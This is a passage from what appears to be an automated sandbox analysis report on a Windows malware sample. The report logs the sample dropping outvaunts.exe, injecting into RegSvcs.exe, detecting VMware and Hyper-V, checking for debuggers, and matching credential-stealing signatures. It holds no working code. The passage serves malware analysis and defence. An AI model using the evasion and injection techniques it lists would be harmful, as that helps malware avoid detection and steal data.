                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00CBC9C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBC93C FindFirstFileW,FindClose, 5_2_00CBC93C
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00CBF200
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00CBF35D
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00CBF65E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00CB3A2B
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CB3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00CB3D4E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CBBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00CBBF27
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DD4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598889
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596921
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596790
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596324
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596217
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599331
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598092
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595115
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594975
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593531
                    Source: RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
                    Source: RegSvcs.exe, 00000006.00000002.4511232795.0000000002B41000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: hgfsZrw6
                    Source: RegSvcs.exe, 00000003.00000002.2190299028.0000000005C6C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                    Source: outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: RegSvcs.exe, 00000006.00000002.4514346303.0000000005EC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | API call chain: ExitProcess graph end node graph_0-98221
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | API call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | API call chain: ExitProcess graph end node

                    Anti Debugging

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_00A97070 CheckRemoteDebuggerPresent, 3_2_00A97070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E441FD BlockInput, 0_2_00E441FD
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00DD3B4C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E05CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_00E05CCC
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00EE8070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_00EE8070
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_011561A8 mov eax, dword ptr fs:[00000030h] 0_2_011561A8
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_01156208 mov eax, dword ptr fs:[00000030h] 0_2_01156208
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_01154B18 mov eax, dword ptr fs:[00000030h] 0_2_01154B18
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_01112168 mov eax, dword ptr fs:[00000030h] 2_2_01112168
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_011121C8 mov eax, dword ptr fs:[00000030h] 2_2_011121C8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_01110AD8 mov eax, dword ptr fs:[00000030h] 2_2_01110AD8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_017CF3E0 mov eax, dword ptr fs:[00000030h] 5_2_017CF3E0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_017CF380 mov eax, dword ptr fs:[00000030h] 5_2_017CF380
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_017CDCF0 mov eax, dword ptr fs:[00000030h] 5_2_017CDCF0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00E281F7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DFA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00DFA395
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DFA364 SetUnhandledExceptionFilter, 0_2_00DFA364
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00C7A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00C7A395
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00C7A364 SetUnhandledExceptionFilter, 2_2_00C7A364
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00C7A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00C7A395
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00C7A364 SetUnhandledExceptionFilter, 5_2_00C7A364
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6EF008
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8F3008
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E28C93 LogonUserW, 0_2_00E28C93
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DD3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00DD3B4C
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00DD4A35
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E34EF5 mouse_event, 0_2_00E34EF5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E281F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00E281F7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E34C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00E34C03
                    Source: toIuQILmr1.exe, 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp, outvaunts.exe, 00000002.00000002.2067226635.0000000000D05000.00000040.00000001.01000000.00000004.sdmp, outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: outvaunts.exe | Binary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DF886B cpuid 0_2_00DF886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E050D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E050D7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E12230 GetUserNameW, 0_2_00E12230
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E0418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00E0418A
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00DD4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DD4AFE
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
